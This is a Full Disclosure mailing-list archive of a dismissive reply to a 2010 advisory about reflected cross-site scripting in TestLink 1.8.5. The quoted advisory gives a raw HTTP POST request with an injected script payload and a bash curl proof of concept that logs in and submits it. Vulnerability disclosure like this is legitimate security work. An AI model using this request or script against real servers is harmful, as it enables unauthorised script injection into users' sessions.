|
Full Disclosure
mailing list archives
Re: Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System
From: Jeff Williams <jeffwillis30 () gmail com>
Date: Sat, 16 Jan 2010 00:03:13 +1100
Prashant,
Usually we do not mention the engineer/dev name's in a timeline, that's
totaly a jackass move.
Anyone civilized would mention in this case :
"{DATE} <VENDOR NAME> says <CRAP>"
Btw posting an "exploit" to trigger a Js alert, it's priceless;
Dude you made my night.
2010/1/15 Prashant <clickprashant () rediffmail com>
1.Title :Cross site scriping Vulnerabilites in Testlink TestManagement and
Execution System.
Discovered by: Prashant Khandelwal (clickprashant () gmail com)
2.Vulnerability Information
Class: Cross site scriping
Impact :Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
3. Vulnerable packages.
Versions affected :All versions <= Testlink 1.8.5
Download :
http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc
4. Vulnerability Description
Cross site scriping Vulnerability has been found in Testlink(
http://www.teamst.org/) a popular and acclaimed free, open source Test
management tool written in PHP.
The issue discovered can only be exploited with an authenticated
session.This cross site scripting vulnerability is present in the file
/testlink/lib/usermanagement/usersView.php & can be exploited
by setting the variable "order_by_login_dir" like below with a HTTP POST
request
Example HTTP header (tested on 1.8.5)
Set the POST variable order_by_login_dir to >">alert(726367128870)%3B
Request
POST /testlink/lib/usermanagement/usersView.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
Host: x.x.x.x
Content-Length: 146
Cookie:
PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache
operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(726367128870)%3B&user_order_by=order_by_login
5. Proof Of Concept
======================
#!/usr/bin/env bash
# Prashant Khandelwal [clickprashant () gmail com]
# Cross site scripting in Testlink the Test Management Tool
# Vendor : Testlink http://www.teamst.org
# Affected Version : <=1.8.5 (
http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc
)
# Vulnerability Discovered: 5-Jan-2010
# This POC is for educational purpose and has only been tested with
testlink 1.8.5
if [ $# -ne 3 ]
then
echo "Usage - ./$0 User password Testlink_root_dir_URI"
echo "Example - ./$0 admin admin http://Testlink-Server/testlink";
exit 1
fi
rm -rf cookies userView.php
curl -d "tl_login=$1&tl_password=$2" $3/login.php -c cookies
curl -d
'"operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(123456789)%3B&user_order_by=order_by_login"'
$3/lib/usermanagement/usersView.php -b cookies -v >userView.php
echo "Please open userView.php in browser a java script alert with text
123456789 should pop up"
=====================
6. Report Timeline
I) 5-Jan-2010
Vulnerability dicovered
II) 11-Jan-2010
Notified about the vulnerability to the developer Francisco Mancardi &
Martin Havlat from testlink team
IV) 11-Jan-2010
Francisco Mancardi ask for POC.
V) 14-Jan-2010
POC's given
VI) 15-Jan-2010
Francisco Mancardi says these vulnerabilities cannot be patched at the
moment and has not commited any timeline for fixing the same.
<http://sigads.rediff.com/RealMedia/ads/click_nx.ads/www.rediffmail.com/signatureline.htm () Middle?>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
| 
